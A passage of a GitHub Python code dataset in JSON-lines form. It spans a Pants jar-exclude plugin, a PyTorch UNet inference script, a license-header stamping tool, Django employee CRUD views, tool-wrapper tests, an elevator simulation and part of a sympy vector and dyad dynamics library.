pants.option.custom_types import list_option\nfrom pants.subsystem.subsystem import Subsystem\nfrom pants.task.task import Task\n\n\nclass SJar(Subsystem):\n options_scope = 'sjar'\n _excludes = None\n\n @classmethod\n def register_options(cls, register):\n super(SJar, cls).register_options(register)\n register('--excludes', advanced=True, type=list_option, default=[], fingerprint=True,\n help='Specifies the org and name of the jars to exclude from all sjar() entries\\n'\n '[ { \"org\": \"\", \"name\": \"\"}, ... 
]')\n\n  @classmethod\n  def get_excludes(cls):\n    if cls._excludes is None:\n      excludes = []\n      for exclude in cls.global_instance().get_options().excludes:\n        excludes.append(Exclude(org=exclude['org'], name=exclude['name']))\n      cls._excludes = excludes\n    return cls._excludes\n\n\nclass SJarTask(Task):\n  \"\"\"A task used solely as a vehicle to register the SJar subsystem.\n\n  See https://github.com/pantsbuild/pants/issues/2858\n  \"\"\"\n  @classmethod\n  def global_subsystems(cls):\n    return super(SJarTask, cls).global_subsystems() + (SJar,)\n\n  def execute(self):\n    pass\n\n\nclass JarDependencyWithGlobalExcludes(JarDependency):\n  \"\"\"Automatically append all 'excludes' defined in pants.ini to a JarDependency target.\n\n  This target is aliased to 'sjar' in register.py. Use it anywhere you would normally use\n  a 'jar()' target to pull in an artifact compiled externally to the repo (e.g. in nexus).\n\n  Include the org and name of the jar to exclude in the [sjar] section in pants.ini:\n\n  [sjar]\n  excludes: [\n    { \"org\" : \"org.json\",\n      \"name\" : \"json\"\n    },\n    ...\n  ]\n\n  The name 'sjar' is historical for a similar implementation defined privately inside of other\n  users' repo. If you mention the term 'sjar' on the Pants mailing list, many existing users\n  will know the concept.\n  \"\"\"\n\n  @classmethod\n  def _calc_excludes(cls, org, name, excludes):\n    # NB(zundel) Below, note that self.excludes is usually [] and the list of global excludes is a\n    # fixed list currently ~25 items in pants.ini\n    excludes = list(excludes or ())\n    excludes.extend(e for e in SJar.get_excludes() if not (e.org == org and e.name == name))\n    return excludes\n\n  def __new__(cls, org, name, rev=None, force=False, ext=None, url=None, apidocs=None,\n              classifier=None, mutable=None, intransitive=False, excludes=None):\n    return JarDependency(\n      org, name, rev=rev, force=force, ext=ext, url=url, apidocs=apidocs,\n      classifier=classifier, mutable=mutable, intransitive=intransitive,\n      excludes=cls._calc_excludes(org, name, excludes),\n    )\n","repo_name":"ericzundel/mvn2pants","sub_path":"src/python/squarepants/plugins/sjar/exclude_globally.py","file_name":"exclude_globally.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"70508400196","text":"import torch.nn as nn\nimport torch\nimport numpy as np\nimport os\nimport cv2\nimport random\n\nimport utils\nimport const\nfrom modeling_and_tuning.models.unet_v2 import UNetV2, UNetV2Smaller\n\nos.environ[\"PYTORCH_CUDA_ALLOC_CONF\"] = \"max_split_size_mb:1024\"\n\n\ndef inference(\n    model: nn.Module,\n    img_size: (int, int) = None,\n    input_path: str = const.VALIDATE_INPUT_PATH,\n    target_path: str = const.VALIDATE_TARGET_PATH,\n    randomize=True  # renamed from 'random' so the stdlib random module is not shadowed\n):\n    with torch.no_grad():\n        raw_input_img = np.load(input_path)\n        target_img = np.load(target_path)\n\n        if img_size:\n            piece_H, piece_W = img_size\n\n            # mul = 10\n            # piece_H = piece_H*mul\n            # piece_W = piece_W*mul\n            if randomize:\n                org_H, org_W, _ = raw_input_img.shape\n                start_h = random.randint(0, org_H - piece_H)\n                start_w = random.randint(0, org_W - piece_W)\n            else:\n                start_h = 0\n                start_w = 0\n            raw_input_img = raw_input_img[start_h:start_h + piece_H, start_w:start_w + piece_W, :]\n            target_img = target_img[start_h:start_h + piece_H, start_w:start_w + piece_W, :]\n\n        img_H, img_W, _ = raw_input_img.shape\n        pieces = utils.split_into_smaller_pieces(raw_input_img)\n        pH, pW, pCh = pieces[0].shape\n        pieces_transformed = []\n        for piece in pieces:\n            piece = 
np.transpose(piece, (2, 0, 1))  # HWC -> CHW; transpose (not reshape) keeps pixel data aligned\n            piece = torch.from_numpy(piece)\n            pieces_transformed.append(piece)\n        input_tensor = torch.stack(pieces_transformed, dim=0)\n\n        batches = []\n        for i in range(0, len(input_tensor), const.BATCH_SIZE):\n            batches.append(input_tensor[i: min(i + const.BATCH_SIZE, len(input_tensor))])\n\n        results = []\n        for batch in batches:\n            b_result = model(batch.cuda())\n            b_result = b_result.cpu().numpy()\n            rB, rCh, rH, rW = b_result.shape\n            b_result = np.transpose(b_result, (0, 2, 3, 1))  # NCHW -> NHWC, again via transpose\n            results.append(b_result)\n        result = np.concatenate(results, axis=0)\n        result = utils.reconstruct_into_whole_image(result, img_H, img_W)\n\n        return raw_input_img, target_img, result\n\n\nif __name__ == \"__main__\":\n    # model = UNetV2(const.INPUT_CHANNELS, const.OUTPUT_CHANNELS, bilinear=const.BILINEAR)\n    model = UNetV2Smaller(const.INPUT_CHANNELS, const.OUTPUT_CHANNELS)\n\n    model.load_state_dict(torch.load(\"../models_storage/tuned-smaller/tuned-60epochs.pt\"))\n    model.to(utils.get_device())\n\n    raw_input_img, target_img, result = inference(model, img_size=const.PIECE_SHAPE)\n    # raw_input_img, target_img, result = inference(model)\n\n    utils.display_image(raw_input_img)\n    utils.display_image(target_img)\n    utils.display_image(result)\n","repo_name":"kkulesz/AMLS_excercise","sub_path":"modeling_and_tuning/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1871553013","text":"import subprocess, os\n\n#Debug flag\ndebug = False\n\n__repo_dir__ = os.path.normpath(\n    os.path.join(os.path.realpath(__file__), '..', '..'))\n\n\n# Markdown code blob we should use to insert into notebook files\ndef getipynb_markdownBlockAsList():\n    markdownBlock = [\n        '\\t{\\n'\n        '\\t\\t\"cell_type\": \"code\",\\n', '\\t\\t\"execution_count\": null,\\n',\n        '\\t\\t\"metadata\": {},\\n', '\\t\\t\"outputs\": [],\\n', '\\t\\t\"source\": [\\n',\n        '\\t\\t\\t\\\"# The MIT License (MIT)\\\\n\\\",\\n', '\\t\\t\\t\\\"#\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# Copyright (c) 2015-2023 Advanced Micro Devices, Inc. All rights reserved.\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"#\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# Permission is hereby granted, free of charge, to any person obtaining a copy\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# of this software and associated documentation files (the \\'Software\\'), to deal\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# in the Software without restriction, including without limitation the rights\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# copies of the Software, and to permit persons to whom the Software is\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# furnished to do so, subject to the following conditions:\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"#\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# The above copyright notice and this permission notice shall be included in\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# all copies or substantial portions of the Software.\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"#\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# THE SOFTWARE IS PROVIDED \\'AS IS\\', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\\\\n\\\",\\n',\n        '\\t\\t\\t\\\"# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\\n\",\n',\n        '\t\t\t\"# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\\n\",\n',\n        '\t\t\t\"# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\\n\",\n',\n        '\t\t\t\"# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\\n\",\n',\n        '\t\t\t\"# THE SOFTWARE.\\n\"\n', '\t\t]\n', '\t},'\n    ]\n    return markdownBlock\n\n\ndef hasKeySequence(inputfile, key_message):\n    result = False\n    if key_message in inputfile:\n        result = True\n\n    return result\n\n\n# Header and footer of the comment block\n# modify these if we want some different style\ndef topHeader(commentChar):\n    delim = None\n\n    #Early return\n    if \"//\" in commentChar:\n        delim = getipynb_markdownBlockAsList()\n        delim.append(\"\\n\")\n        return ''.join(str(x) for x in delim)\n\n    if \"*\" in commentChar:\n        delim = \"/*\\n\"\n    if \"#\" in commentChar:\n        delim = \"#####################################################################################\\n\"\n    return delim\n\n\ndef bottomFooter(commentChar):\n    delim = None\n    #Early return - no footer handled by\n    if \"//\" in commentChar:\n        return delim\n\n    if \"*\" in commentChar:\n        delim = \"*/\\n\"\n    if \"#\" in commentChar:\n        delim = \"#####################################################################################\\n\"\n    return delim\n\n\n#Simple just open and write stuff to each file with the license stamp\ndef openAndWriteFile(filename, message, commentChar):\n    add_shebang = False\n    #markdown file stamping for .ipynb\n    save_markdown_lines = []\n    modify_markdown = False\n\n    #open save old contents and append things here\n    if debug is True:\n        print(\"Open\", filename, end='')\n\n    #with open(filename, 'r') as contents:\n    #    save = contents.read()\n    try:\n        file = open(filename, 'r')\n    except OSError as e:\n        if debug is True:\n            print(str(e) + \"....Open Error: Skipping file \")\n        # nothing was opened, so there is no file object to close\n        return\n    else:\n        with file as contents:\n            try:\n                if commentChar != \"//\":\n                    saved_shebang = contents.readline()\n                    add_shebang = hasKeySequence(saved_shebang, \"#!\")\n\n                    # No shebang so start at beginning line\n                    if add_shebang is False:\n                        contents.seek(0)\n\n                # Get the first tags in notebook before we insert license into a cell as a comment block\n                if commentChar == \"//\":\n                    save_markdown_lines.extend(contents.readline())  # { tag\n                    save_markdown_lines.extend(\n                        contents.readline())  # \"cells\": [ tag\n                    modify_markdown = True\n\n                #read remaining lines in the original file\n                save = contents.read()\n\n                hasAmdLic = hasKeySequence(\n                    save, \"Advanced Micro Devices, Inc. 
All rights reserved\")\n                hasOtherLic = hasKeySequence(save, \"Software License\")\n\n                #Check if we have a licence stamp already\n                if hasAmdLic or hasOtherLic:\n                    if debug is True:\n                        print(\"....Already Stamped: Skipping file \")\n\n                    contents.close()\n                    return\n\n            except UnicodeDecodeError as eu:\n                if debug is True:\n                    print(str(eu) + \"...Skipping binary file \")\n                contents.close()\n                return\n\n        if debug is True:\n            print(\"...Writing header\", end='')\n\n        with open(filename, 'w') as contents:\n            #append the licence to the top of the file\n\n            #Append shebang before license\n            if add_shebang is True:\n                contents.write(saved_shebang + \"\\n\")\n\n            #Append markdown hooks before license\n            if modify_markdown is True:\n                contents.write(''.join(str(x) for x in save_markdown_lines))\n\n            delim = topHeader(commentChar)\n            if delim is not None:\n                contents.write(delim)\n                #print(delim)\n\n            if modify_markdown is False:\n                for line in message:\n                    if line != '':\n                        contents.write(commentChar + \" \" + line + \"\\n\")\n                    else:\n                        contents.write(commentChar + \"\\n\")\n\n            delim = bottomFooter(commentChar)\n            if delim is not None:\n                contents.write(delim)\n\n            #write remaining contents\n            contents.write(save)\n            if debug is True:\n                print(\"...done\")\n\n\n# Get the file type based on what we care about to tag with our licence\n# file. Otherwise return None for the delimiter and skip the file\n\n\ndef getDelimiter(filename):\n\n    delimiterDict = {\n        \".cpp\": \"*\",\n        \".hpp\": \"*\",\n        \".h\": \"*\",\n        \".ipynb\": \"//\",\n        \".py\": \"#\",\n        \".txt\": \"#\",\n        \".bsh\": \"#\",\n        \".sh\": \"#\",\n        \".cmake\": \"#\"\n    }\n    listOfKeys = delimiterDict.keys()\n    delimiter = None\n\n    for extension in listOfKeys:\n        if extension in filename:\n            delimiter = delimiterDict[extension]\n            break\n\n    return delimiter\n\n\ndef main():\n\n    message = open(os.path.join(__repo_dir__, 'LICENSE')).read()\n\n    #Get a list of all the files in our git repo\n    #bashCommand = \"git ls-files --exclude-standard\"\n    #print (bashCommand.split())\n    proc = subprocess.run(\"git ls-files --exclude-standard\",\n                          shell=True,\n                          stdout=subprocess.PIPE,\n                          cwd=__repo_dir__)\n    fileList = proc.stdout.decode().split('\\n')\n    message = message.split('\\n')\n\n    if debug is True:\n        print(\"Target file list:\\n\" + str(fileList))\n        print(\"Output Message:\\n\" + str(message))\n\n    for rfile in fileList:\n        file = os.path.join(__repo_dir__, rfile)\n        #print(file)\n        commentDelim = getDelimiter(file)\n        if commentDelim is not None:\n            openAndWriteFile(file, message, commentDelim)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"ROCmSoftwarePlatform/AMDMIGraphX","sub_path":"tools/license_stamper.py","file_name":"license_stamper.py","file_ext":"py","file_size_in_byte":7886,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"61"} +{"seq_id":"34511071512","text":"data = [[500,600],[700,500],[400,800],[300,500],[600,500],[200,700],[600,800]]\nsums = []\nsum1 = 0\nfor i in data:\n    for j in i:\n        sum1 += j\n    sums.append(sum1)\n    sum1 = 0\n\nmaxsum = max(sums)\nindex = sums.index(maxsum)\nprint(sums)\nsumlist2 = []\nsum2 = 0\nfor i in data:\n    sum2 += sum(i)\n    sumlist2.append(sum2)\n    sum2 = 0\nprint(sumlist2)\n# for i in sumlist2:\n#     sum3 += \n\n\n\n\n# def openthefile():\n#     file = open(\"C:\\\\Users\\\\Victus\\\\OneDrive\\\\Desktop\\\\filepy.txt\",\"w\")\n#     str = \"Hello\\nWelcome to file handling in python\"\n#     file.write(str)\n#     print(\"file updated\")\n\n# def appenddatatofile():\n#     file = 
open(\"C:\\\\Users\\\\Victus\\\\OneDrive\\\\Desktop\\\\filepy.txt\",\"a\")\n# str1 = \"\\nThis data is appended to the file\\n\"\n# str2 = \"PalinDrome Word Naman\"\n# file.write(str1)\n# print(\"file updated\")\n\n# list = []\n\n# def readdatafromfile():\n# file = open(\"C:\\\\Users\\\\Victus\\\\OneDrive\\\\Desktop\\\\filepy.txt\",\"r\")\n# # print(file.read())\n# i = 0\n# count = 0\n# for i in file:\n# for word in i.split():\n# count+=1\n# list.append(word)\n# # print(i)\n# print(count)\n# print(\"list=\",list)\n# file.close()\n \n# list1 = []\n# list2 = []\n# duplicate = []\n# unique = []\n# # openthefile()\n# # appenddatatofile()\n# readdatafromfile()\n\n# def findpalindrome():\n# for i in list:\n# j = i[::-1]\n# if i == j:\n# list1.append(i)\n# print(list1)\n\n# # findpalindrome() \n\n# def finduplicate():\n# for i in list:\n# if i not in unique:\n# unique.append(i)\n# elif i not in duplicate:\n# duplicate.append(i)\n# print(unique)\n\n# finduplicate()\n","repo_name":"SujalNayak/Website","sub_path":"OneDrive/Desktop/VS Code/Desktop/Python/File_Handling.py","file_name":"File_Handling.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18163338955","text":"\nclass Elevator:\n __max_speed = 0.1 # meters/second\n\n def __init__(self, controller, floors, name: str, index: int):\n self.controller = controller\n self.destination = None\n self.elevation = floors[0].elevation # meters\n self.velocity = 0.0 # meters/second\n self.name = name\n self.index = index\n self.buttons = {floor: False for floor in floors}\n\n def __str__(self):\n return f\"{self.name} h={self.elevation} v={self.velocity}\"\n\n def tick(self):\n if self.destination is not None:\n distance = self.destination.elevation - self.elevation\n if distance > 0.1:\n self.velocity = self.__max_speed\n elif distance < -0.1:\n self.velocity = -self.__max_speed\n else:\n self.velocity = 0.0\n self.controller.on_elevator_arrived(self)\n\n self.elevation += self.velocity\n","repo_name":"xajohnson/pyelevator","sub_path":"pyelevator/elevator.py","file_name":"elevator.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7151493022","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import JsonResponse\nfrom django.template.loader import render_to_string\n\nfrom .models import Employee\nfrom .forms import EmployeeForm\n\n\n\ndef employee_list(request):\n employees = Employee.objects.all()\n return render(request, 'employ/employee_list.html', {'employees': employees})\n\n\ndef save_employee_form(request, form, template_name):\n data = dict()\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n data['form_is_valid'] = True\n employee = Employee.objects.all()\n data['html_employee_list'] = render_to_string('employ/includes/employee_list.html', {\n 'employee': employee\n })\n else:\n data['form_is_valid'] = False\n context = {'form': form}\n data['html_form'] = render_to_string(template_name, context, request=request)\n return JsonResponse(data)\n\n\ndef employee_create(request):\n if request.method == \"POST\":\n form = EmployeeForm(request.POST, request.FILES)\n else:\n form = EmployeeForm()\n return save_employee_form(request, form, 'employ/includes/employee_create.html')\n\n\ndef employee_update(request, pk):\n employee = get_object_or_404(Employee, pk=pk)\n if request.method == 'POST':\n form 
= EmployeeForm(request.POST, request.FILES, instance=employee)\n    else:\n        form = EmployeeForm(instance=employee)\n    return save_employee_form(request, form, 'employ/includes/employee_update.html')\n\n\ndef employee_delete(request, pk):\n    employee = get_object_or_404(Employee, pk=pk)\n    data = dict()\n    if request.method == 'POST':\n        employee.delete()\n        data['form_is_valid'] = True\n        employees = Employee.objects.all()\n        data['html_employee_list'] = render_to_string('employ/includes/employee_list.html', {\n            'employees': employees\n        })\n    else:\n        context = {'employee': employee}\n        data['html_form'] = render_to_string('employ/includes/employee_delete.html', context, request=request)\n    return JsonResponse(data)\n","repo_name":"IBRAHIM-kd/Employee-Ems","sub_path":"EMS/employee/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27461111448","text":"import glob\nimport sys\nfrom pathlib import Path\nfrom unittest.mock import patch\n\nfrom tbpore.constants import repo_root\nfrom tbpore.external_tools import ExternalTool\n\n\nclass TestExternalTools:\n    @patch.object(\n        ExternalTool,\n        ExternalTool._build_command.__name__,\n        return_value=[\"mocked\", \"command\", \"arg\"],\n    )\n    @patch.object(Path, Path.mkdir.__name__)\n    def test___constructor(self, mkdir_mock, build_command_mock):\n        logdir = Path(\"logs\")\n\n        external_tool = ExternalTool(\"tool\", \"input\", \"output\", \"params\", logdir)\n\n        assert external_tool.command == [\"mocked\", \"command\", \"arg\"]\n        assert external_tool.command_as_str == \"mocked command arg\"\n        assert (\n            external_tool.out_log\n            == \"logs/tool_c238863b32d18040bbf255fa3bf0dc91e9afa268335b56f51abe3c6d1fd83261.out\"\n        )\n        assert (\n            external_tool.err_log\n            == \"logs/tool_c238863b32d18040bbf255fa3bf0dc91e9afa268335b56f51abe3c6d1fd83261.err\"\n        )\n\n        build_command_mock.assert_called_once_with(\"tool\", \"input\", \"output\", \"params\")\n        mkdir_mock.assert_called_once_with(parents=True, exist_ok=True)\n\n    def test___build_command___simple_command(self):\n        expected_escaped_command = [\"tool\", \"param1\", \"param2\", \"-o\", \"out\", \"-i\", \"in\"]\n        actual_escaped_command = ExternalTool._build_command(\n            \"tool\", \"-i in\", \"-o out\", \"param1 param2\"\n        )\n        assert expected_escaped_command == actual_escaped_command\n\n    def test___build_command___single_quote_escaped(self):\n        expected_escaped_command = [\n            \"tool\",\n            \"params\",\n            \"with\",\n            \"escaped arg\",\n            \"-o\",\n            \"escaped out\",\n            \"-i\",\n            \"escaped in\",\n        ]\n        actual_escaped_command = ExternalTool._build_command(\n            \"tool\", \"-i 'escaped in'\", \"-o 'escaped out'\", \"params with 'escaped arg'\"\n        )\n        assert expected_escaped_command == actual_escaped_command\n\n    def test___build_command___double_quote_escaped(self):\n        expected_escaped_command = [\n            \"tool\",\n            \"params\",\n            \"with\",\n            \"escaped arg\",\n            \"-o\",\n            \"escaped out\",\n            \"-i\",\n            \"escaped in\",\n        ]\n        actual_escaped_command = ExternalTool._build_command(\n            \"tool\", '-i \"escaped in\"', '-o \"escaped out\"', 'params with \"escaped arg\"'\n        )\n        assert expected_escaped_command == actual_escaped_command\n\n    def test___run(self):\n        logsdir = repo_root / \"tests/helpers/logs\"\n        logsdir.mkdir(parents=True, exist_ok=True)\n        for file in logsdir.iterdir():\n            file.unlink()\n\n        python_script = str(repo_root / \"tests/helpers/run_test.py\")\n        external_tool = ExternalTool(\n            sys.executable,\n            \"input\",\n            \"output\",\n            python_script,\n            logsdir,\n        
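# ExternalTool takes its arguments positionally: executable, input, output, params, logdir (see the constructor test above)\n        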
)\n\n external_tool.run()\n\n out_file = glob.glob(f\"{logsdir}/*.out\")[0]\n with open(out_file) as out_file_fh:\n lines = out_file_fh.readlines()\n assert lines == [\"out\\n\"]\n\n err_file = glob.glob(f\"{logsdir}/*.err\")[0]\n with open(err_file) as err_file_fh:\n lines = err_file_fh.readlines()\n assert lines == [\n \"err\\n\",\n f\"Command line: {sys.executable} {python_script} output input\\n\",\n ]\n","repo_name":"mbhall88/tbpore","sub_path":"tests/test_external_tools.py","file_name":"test_external_tools.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"3038453434","text":"import time\n\nfrom sympy import (Symbol, symbols, Basic, Function, Mul, Pow, Matrix, sin,\n cos, tan, cot, S, eye, Add, trigsimp, expand, pretty, Eq, collect, sqrt,\n sympify, factor, zeros, simplify, solve_linear_system, ratsimp,\n powsimp, block_diag, Derivative, Expr)\nfrom sympy.printing.pretty.pretty import PrettyPrinter\nfrom sympy.printing.str import StrPrinter\n\nfrom common import e1, e2, e3, zero, t\n\nBasic.__str__ = lambda self: PyDyStrPrinter().doprint(self)\nBasic.__repr__ = lambda self: PyDyStrPrinter().doprint(self)\nMatrix.__str__ = lambda self: PyDyStrPrinter().doprint(self)\n\nclass UnitVector(Expr):\n \"\"\"A standard unit vector with a symbolic and a numeric representation.\n \"\"\"\n\n def __init__(self, frame, i=0): #=-1,num=None):\n self.frame = frame # Parent reference frame\n self.common_frames = set([frame])\n self.i = i\n self.v = {}\n s = frame.name\n if i == 1:\n self.v['sym'] = Symbol(s.lower()+str(i))\n self.v['num'] = e1\n elif i == 2:\n self.v['sym'] = Symbol(s.lower()+str(i))\n self.v['num'] = e2\n elif i == 3:\n self.v['sym'] = Symbol(s.lower()+str(i))\n self.v['num'] = e3\n elif i == 0:\n self.v['sym'] = Symbol(s.lower()+str(0))\n self.v['num'] = zero\n\n def __str__(self):\n return PyDyStrPrinter().doprint(self)\n\n def __repr__(self):\n return PyDyStrPrinter().doprint(self)\n\n def __cmp__(self, other):\n if isinstance(other, UnitVector):\n if self.frame == other.frame:\n return cmp(self.i, other.i)\n else:\n return cmp(len(self.frame.ref_frame_list),\n len(other.frame.ref_frame_list))\n else:\n raise NotImplementedError()\n\n def __eq__(self, other):\n if isinstance(other, UnitVector):\n if other.frame == self.frame:\n return (self.v['num'] == other.v['num'])\n else:\n other_selfframe = other.express(self.frame)\n if isinstance(other_selfframe, UnitVector):\n return (self.v['num'] == other_selfframe.v['num'])\n else:\n return False\n elif isinstance(other, Vector):\n other_selfframe = other.express(self.frame)\n if isinstance(other_selfframe, UnitVector):\n return (self.v['num'] == other_selfframe.v['num'])\n else:\n return False\n elif isinstance(other, (Add, Mul)):\n other_as_Vector = Vector(other)\n return (self == other_as_Vector)\n else:\n return False\n\n def __mul__(self, other):\n if isinstance(other, Dyad):\n return NotImplemented\n else:\n return Expr.__mul__(self, other)\n\n def __neg__(self):\n return Vector({self: -1})\n\n def express(self, frame):\n \"\"\"Express a UnitVector in a different reference frame.\n \"\"\"\n\n if self.frame == frame:\n return self\n else:\n frame_list = self.frame.get_frames_list(frame)\n if len(self.common_frames) > 1:\n # Means that self is fixed in more than one frame\n for cf in self.common_frames:\n if cf == self.frame:\n continue\n elif cf in frame_list:\n fl = cf.get_frames_list(frame)\n if len(fl) < len(frame_list):\n 
frame_list = fl\n matrices = frame_list[0].get_rot_matrices(frame_list[-1])\n else:\n matrices = self.frame.get_rot_matrices(frame)\n if len(matrices) == 1 and matrices[0]*self.v['num'] == self.v['num']:\n return frame[self.i]\n else:\n u = self.v['num']\n for m in reversed(matrices):\n u = m*u\n return Vector(u[0]*frame[1] + u[1]*frame[2] + u[2]*frame[3])\n\n def dot(self, other):\n \"\"\"UnitVector dot product.\n \"\"\"\n if isinstance(other, UnitVector):\n nrf = self.frame.NewtonianReferenceFrame\n if (self, other) in nrf.uv_dot_products:\n return nrf.uv_dot_products[(self, other)]\n elif (other, self) in nrf.uv_dot_products:\n return nrf.uv_dot_products[(other, self)]\n else:\n c = other.express(self.frame)\n if isinstance(c, UnitVector):\n dp = (self.v['num'].T * c.v['num'])[0]\n self.frame.NewtonianReferenceFrame.uv_dot_products[(self, \\\n other)] = dp\n return dp\n elif isinstance(c, Vector):\n s = c.dict.get(self, 0)\n self.frame.NewtonianReferenceFrame.uv_dot_products[(self, \\\n other)] = s\n return s\n else:\n raise NotImplementedError()\n elif isinstance(other, Vector):\n s = S(0)\n for k, c in other.dict.items():\n s += c*self.dot(k)\n return s\n elif isinstance(other, Dyad):\n return other.ldot(self)\n else:\n raise NotImplementedError()\n\n def cross(self, other):\n \"\"\"UnitVector cross product.\n \"\"\"\n def cross_with_Vector(self, c): # local function\n cp = {}\n for k, coef in c.dict.items():\n term = self.cross(k)\n if isinstance(term, UnitVector):\n cp[term] = cp.get(term, 0) + coef\n elif isinstance(term, Vector):\n for kt in term.dict:\n cp[kt] = cp.get(kt, 0) + coef*term.dict[kt]\n return Vector(cp)\n\n if isinstance(other, UnitVector):\n nrf = self.frame.NewtonianReferenceFrame\n if (self, other) in nrf.uv_cross_products:\n return nrf.uv_cross_products[(self, other)]\n elif (other, self) in nrf.uv_cross_products:\n return -nrf.uv_cross_products[(other, self)]\n else:\n c = other.express(self.frame)\n #print self.frame\n if isinstance(c, UnitVector):\n cp_list = [self.v['num'][1]*c.v['num'][2] - \\\n self.v['num'][2]*c.v['num'][1], \\\n -self.v['num'][0]*c.v['num'][2] + \\\n self.v['num'][2]*c.v['num'][0], \\\n self.v['num'][0]*c.v['num'][1] - \\\n self.v['num'][1]*c.v['num'][0]]\n cp = {}\n for (c, i) in zip(cp_list, [1, 2, 3]):\n if c != 0:\n cp.update({self.frame[i] : c})\n if len(cp) == 0:\n return Vector(0)\n elif len(cp) == 1:\n if cp.values()[0] == 1:\n return cp.keys()[0] # Return a UnitVector object\n else:\n return Vector(cp)\n else:\n cp1 = Vector(cp)\n cp2 = cp1.express(other.frame)\n if isinstance(cp2, UnitVector):\n return cp2\n else:\n for k in cp1.dict:\n cp1.dict[k] = trigsimp(cp1.dict[k])\n for k in cp2.dict:\n cp2.dict[k] = trigsimp(cp2.dict[k])\n if isinstance(cp1, UnitVector):\n return cp1\n elif isinstance(cp2, UnitVector):\n return cp2\n elif len(cp1.dict) <= len(cp2.dict):\n return cp1\n else:\n return cp2\n elif isinstance(c, Vector):\n cp1 = cross_with_Vector(self, c)\n cp2 = cp1.express(other.frame)\n if isinstance(cp1, UnitVector):\n return cp1\n elif isinstance(cp2, UnitVector):\n return cp2\n else:\n for k in cp1.dict:\n cp1.dict[k] = trigsimp(cp1.dict[k])\n for k in cp2.dict:\n cp2.dict[k] = trigsimp(cp2.dict[k])\n if isinstance(cp1, UnitVector):\n return cp1\n elif isinstance(cp2, UnitVector):\n return cp2\n elif len(cp1.dict) <= len(cp2.dict):\n return cp1\n else:\n return cp2\n elif isinstance(other, Vector):\n return cross_with_Vector(self, other)\n else:\n raise NotImplementedError()\n\n def dt(self, diff_frame):\n 
\"\"\"UnitVector time derivative.\n \"\"\"\n if isinstance(diff_frame, ReferenceFrame):\n if self.frame == diff_frame:\n return Vector(0)\n else:\n return cross(self.frame.ang_vel(diff_frame), self)\n else:\n raise TypeError(\"Must provide a ReferenceFrame to take the \\\n derivative in\")\n\nclass Dyad(object):\n \"\"\"General dyad expression.\n \"\"\"\n def __init__(self, v):\n \"\"\" v should be an additive expression of the form:\n (sympy expression)*UnitVector*UnitVector\n\n The sympy expression is optional, but typically would be an inertia\n scalar.\n \"\"\"\n self.dict = {}\n if isinstance(v, dict):\n self.dict = v\n elif v == 0 or v == {}:\n pass\n else:\n raise NotImplementedError()\n\n def __add__(self, other):\n if isinstance(other, Dyad):\n nd = {}\n for k, v in self.dict.items():\n nd[k] = v\n for k, v in other.dict.items():\n nd[k] = nd.get(k, 0) + v\n for k, v in nd.items():\n if v == 0:\n nd.pop(k)\n return Dyad(nd)\n\n def __neg__(self):\n nd = {}\n for k, v in self.dict.items():\n nd[k] = -v\n return Dyad(nd)\n\n def __sub__(self, other):\n if isinstance(other, Dyad):\n return self.__add__(other.__neg__())\n\n def subs(self, subs_dict):\n \"\"\"Substitute into the scalar coeffiecients of each dyadic term.\n \"\"\"\n nd = {}\n for k, v in self.dict.items():\n nd[k] = v.subs(subs_dict)\n return Dyad(nd)\n\n def expand(self):\n \"\"\"Expand scalar coefficients of each dyadic term.\n \"\"\"\n nd = {}\n for k, v in self.dict.items():\n nd[k] = v.expand()\n return Dyad(nd)\n\n def n(self):\n \"\"\"Numerically evaluate each scalar coefficient.\n \"\"\"\n nd = {}\n for k, v in self.dict.items():\n nd[k] = v.n()\n return Dyad(nd)\n\n\n def ldot(self, other):\n \"\"\"Multplitcation by a UnitVector/Vector on the left.\n v * Dyad\n\n Returns a UnitVector / Vector\n \"\"\"\n vec_dict = {}\n if isinstance(other, (UnitVector, Vector)):\n for d_term, coeff in self.dict.items():\n scalar_part = coeff*other.dot(d_term.args[0])\n if d_term.is_Mul:\n vec_dict[d_term.args[1]] = vec_dict.get(d_term.args[1], 0) \\\n + 